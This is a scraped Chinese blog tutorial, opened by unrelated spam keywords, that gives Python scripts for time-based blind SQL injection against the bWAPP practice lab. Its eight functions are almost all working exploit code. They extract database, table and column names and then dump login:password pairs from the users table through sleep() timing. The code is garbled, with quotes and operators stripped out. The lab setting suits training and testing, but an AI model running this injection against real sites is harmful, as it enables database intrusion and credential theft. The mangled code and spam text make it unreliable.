网站建设pqiw,在相亲网站做红娘,带字图片制作器,重庆川九建设有限责任公司官方网站文章目录 一、获取数据库名称长度二、获取数据库名称三、获取表名总长度四、获取表名五、获取指定表列名总长度六、获取指定表列名七、获取指定表指定列的表内数据总长度八、获取指定表指定列的表内数据 一、获取数据库名称长度
测试环境是bwapp靶场 SQL Injection - Blind - … 文章目录 一、获取数据库名称长度二、获取数据库名称三、获取表名总长度四、获取表名五、获取指定表列名总长度六、获取指定表列名七、获取指定表指定列的表内数据总长度八、获取指定表指定列的表内数据 一、获取数据库名称长度
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based
import requests
import timeHEADER{Cookie:BEEFHOOKsC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; securitylow; PHPSESSIDi79vfbbj4l30k326ckunvitfe5; security_level0
}
BASE_URLhttp://127.0.0.1:9004/sqli_15.php?def get_database_name_length(value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(database()){} and sleep(1) -- {}.format(value1, i, value2)start_time time.time()resp requests.get(url,headersHEADER)#print(resp.content)if time.time()-start_time1:print(数据库长度为:{}.format(i))count ibreakreturn count执行语句: databaselen get_database_name_length(“title”, “actionsearch”) 1 执行结果 tips:title,actionsearch需要使用burp抓包获得 –两边有空格
二、获取数据库名称
def get_database_name(len, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr(database(),{},1)){} and sleep(2) -- {}.format(value1, i, j, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time2:print({}:{}.format(i,j),chr(j))str(chr(j))breakprint(数据库名称为:,str)return str执行语句: database get_database_name(databaselen,“title”, “actionsearch”) 执行结果
三、获取表名总长度
def get_table_name_length(database, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema {}), 1)) {} and sleep(1) -- {}.format(value1, database,i, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(表名总长度为:{}.format(i))count ibreakreturn count执行语句: tablelen get_table_name_length(database,“title”, “actionsearch”) 1 执行结果
四、获取表名
def get_table_name(len,database, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema {}),{},1)){} and sleep(2) -- {}.format(value1, database, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time2:#print({}:{}.format(i,j),chr(j))str(chr(j))breakprint({}:.format(i),str)print(表名为:,str)return str执行语句: get_table_name(tablelen,database,“title”, “actionsearch”) 执行结果
,
五、获取指定表列名总长度
def get_column_name_length(database,table, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select group_concat(column_name) from information_schema.columns where table_name{} and table_schema{}), 1)) {} and sleep(1) -- {}.format(value1, table,database,i, value1)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(列名总长度为:{}.format(i))count ibreakreturn count执行语句 columnlen get_column_name_length(database, “users”,“title”, “actionsearch”) 1 执行结果
六、获取指定表列名
def get_column_name(len,database, table, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name{} and table_schema{}), 1),{},1)){} and sleep(2) -- {}.format(value1, table, database, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER),if time.time()-start_time2:str(chr(j))breakprint({}:.format(i),str)print(列名为:,str)return str执行语句 get_column_name(columnlen, database, “users”,“title”, “actionsearch”) 执行结果
七、获取指定表指定列的表内数据总长度
def get_data_name_length(table, username, password, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select group_concat({}, :, {}) from {}), 1)) {} and sleep(1) -- {}.format(value1, username, password, table,i, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(列数据总长度为:{}.format(i))count ibreakreturn count执行语句 datalen get_data_name_length(“users”, “login”, “password”,“title”, “actionsearch”) 1 执行结果
八、获取指定表指定列的表内数据
def get_data_name(len, table, username, password, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr((select group_concat({}, :, {}) from {}),{},1)){} and sleep(2) -- {}.format(value1, username, password, table, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER),if time.time()-start_time2:str(chr(j))breakprint({}:.format(i),str)print(登录数据为:,str)return str执行语句 get_data_name(datalen, “users”, “login”, “password”,“title”, “actionsearch”) 执行结果 我们发现使用这种方法似乎比burp更快更高效只是从列爆破开始需要自己选表名
